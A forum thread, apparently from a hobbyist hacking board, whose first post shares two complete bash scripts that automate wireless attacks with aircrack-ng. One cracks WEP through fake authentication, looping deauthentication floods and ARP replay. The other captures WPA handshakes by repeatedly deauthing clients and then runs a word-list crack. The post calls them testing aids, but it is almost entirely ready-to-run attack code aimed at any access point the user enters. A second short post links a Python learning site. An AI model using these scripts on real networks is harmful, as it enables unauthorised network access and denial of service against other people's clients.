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    Software, music, games, telecommunications, gsm/packet radio,and electronics in general.

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  1. We all know that Wired Equivalency Privacy is entirely breakable and that Wireless Protected Access can be broken using a word-list or hash-tables. Here are a couple scripts to HELP you test these things. Make sure aircrack-ng in installed. #!/bin/bash ## ### Automatic wep-cracking script(run this as ROOT): by frogbong(frogbong.wilson@gmail.com) ## Note: This script will not work 100% of the time, it is merely a way to reduce typing # export IFACE export BSSID export CHANNEL ### Check for argument if [ -z $1 ] then echo "Usage: $0 <interface>" echo "Set MONITOR mode interface." exit fi ### Start airodump-ng to collect target information IFACE=$1 sudo airodump-ng $IFACE echo "### TARGET INFORMATION ###" echo "Enter BSSID: "; read BSSID echo "Enter AP Channel: "; read CHANNEL echo "Enter Target MAC(optional): "; read CLNTMAC echo "Starting auto-wep.sh with these parameters: " echo " Interface: $IFACE"; sleep 1 echo " BSSID: $BSSID"; sleep 1 echo " Channel: $CHANNEL"; sleep 1 ### Start wep cracking process using components of aircrack-ng in the background (&) # Start airodump-ng xterm -e "sudo airodump-ng --bssid $BSSID --channel $CHANNEL -w AUTO-WEP $IFACE" & # Start aireplay-ng for fake auth. sleep 3 xterm -e "sudo aireplay-ng -1 0 $IFACE -a $BSSID" & # Wait for fake association before deauth. sleep 5 xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; sleep 10; done" & # Start aireplay-ng for ARP replay xterm -e "sudo aireplay-ng -3 $IFACE -b $BSSID" & # Start cracking .cap file after giving some time to generate initialization vectors(iv's) sleep 60 sudo aircrack-ng AUTO-WEP*.cap #!/bin/bash ## ### Script to help capture wpa-handshake(run this as ROOT): by frogbong(frogbong.wilson@gmail.com) ## # export IFACE export BSSID export CHANNEL export TIME # time between deauth. broadcast export CLIENT # client to deauth. (optional) ### Check for argument if [ -z $1 ] then echo "Usage: $0 <interface>" echo "Set MONITOR mode interface." exit fi ### Start airodump-ng to collect target information IFACE=$1 sudo airodump-ng $IFACE echo "### TARGET INFORMATION ###" echo "Enter BSSID: "; read BSSID echo "Enter AP Channel: "; read CHANNEL echo "Enter deauth. delay: "; read TIME echo "Enter client(optional): "; read CLIENT echo "Starting $0 with these parameters: " echo " Interface: $IFACE"; sleep 1 echo " BSSID: $BSSID"; sleep 1 echo " Channel: $CHANNEL"; sleep 1 echo " Time Delay: $TIME"; sleep 1 if [ "$CLIENT" != "" ] then echo " Client: $CLIENT"; sleep 1 fi ### Start capture and regular deauth. # Start airodump-ng to capture handshake sudo xterm -e "airodump-ng --bssid $BSSID --channel $CHANNEL -w WPA-HS $IFACE" & # Start deauth every 20 minutes sleep 3 # wait for airodump to startup if [ "$CLIENT" != "" ] then xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID -c $CLIENT; echo 'Sleeping for $TIME seconds'; sleep $TIME; done" & fi if [ "$CLIENT" = "" ] then xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; echo 'Sleeping for $TIME second(s)'; sleep $TIME; done" & fi # Start aircrack-ng in wpa mode to parse the .cap file for handshakes while true; do aircrack-ng -a 2 WPA*.cap -w /usr/share/dict/american-english; sleep 30; done
  2. That's a good one Strife. Here is a site solely for learning python. http://www.pythonchallenge.com/
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